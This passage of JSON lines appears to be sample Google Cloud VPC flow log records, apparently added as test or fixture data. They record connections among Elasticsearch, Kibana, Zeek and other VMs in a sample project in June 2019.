-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fm","jsonPayload":{"bytes_sent":"125197","connection":{"dest_ip":"10.87.40.76","dest_port":33540,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"242","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373eg","jsonPayload":{"bytes_sent":"917832","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"230","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fc","jsonPayload":{"bytes_sent":"55572","connection":{"dest_ip":"67.43.156.14","dest_port":53096,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"133","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373eq","jsonPayload":{"bytes_sent":"4615","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821049800Z","packets_sent":"75","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ev","jsonPayload":{"bytes_sent":"75612","connection":{"dest_ip":"67.43.156.13","dest_port":65318,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"583","reporter":"SRC","rtt_msec":"96","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373em","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ew","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":56478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373e9","jsonPayload":{"bytes_sent":"64140","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"371","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f1","jsonPayload":{"bytes_sent":"231764","connection":{"dest_ip":"10.87.40.76","dest_port":33694,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ff","jsonPayload":{"bytes_sent":"107878","connection":{"dest_ip":"67.43.156.13","dest_port":65276,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"614","reporter":"SRC","rtt_msec":"156","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fq","jsonPayload":{"bytes_sent":"595838","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":52430},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"299","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"14iipwlfd8t01n","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":56410,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"SRC","rtt_msec":"37","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01j","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":51950,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01o","jsonPayload":{"bytes_sent":"361966","connection":{"dest_ip":"67.43.156.13","dest_port":33876,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"80","reporter":"SRC","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01p","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":51950},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01e","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58658,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01q","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":59924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58658},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01k","jsonPayload":{"bytes_sent":"123732","connection":{"dest_ip":"67.43.156.13","dest_port":65272,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"618","reporter":"SRC","rtt_msec":"123","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01f","jsonPayload":{"bytes_sent":"76342","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65273},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"710","reporter":"DEST","rtt_msec":"115","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t018","jsonPayload":{"bytes_sent":"9761","connection":{"dest_ip":"192.168.2.73","dest_port":45224,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"end_time":"2019-06-14T03:44:23.955039461Z","packets_sent":"13","reporter":"SRC","rtt_msec":"242","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01a","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":56410},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"DEST","rtt_msec":"37","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t017","jsonPayload":{"bytes_sent":"51612","connection":{"dest_ip":"67.43.156.13","dest_port":65277,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"615","reporter":"SRC","rtt_msec":"95","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01m","jsonPayload":{"bytes_sent":"74330","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65272},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"745","reporter":"DEST","rtt_msec":"123","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t015","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.13","dest_port":59924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01h","jsonPayload":{"bytes_sent":"76622","connection":{"dest_ip":"67.43.156.13","dest_port":65273,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"599","reporter":"SRC","rtt_msec":"115","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t019","jsonPayload":{"bytes_sent":"42","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.168.2.73","src_port":45224},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:24.922448897Z","packets_sent":"5","reporter":"DEST","rtt_msec":"242","src_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t016","jsonPayload":{"bytes_sent":"75263","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65277},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"729","reporter":"DEST","rtt_msec":"95","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01c","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":34646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:10.529592195Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:10.413494375Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 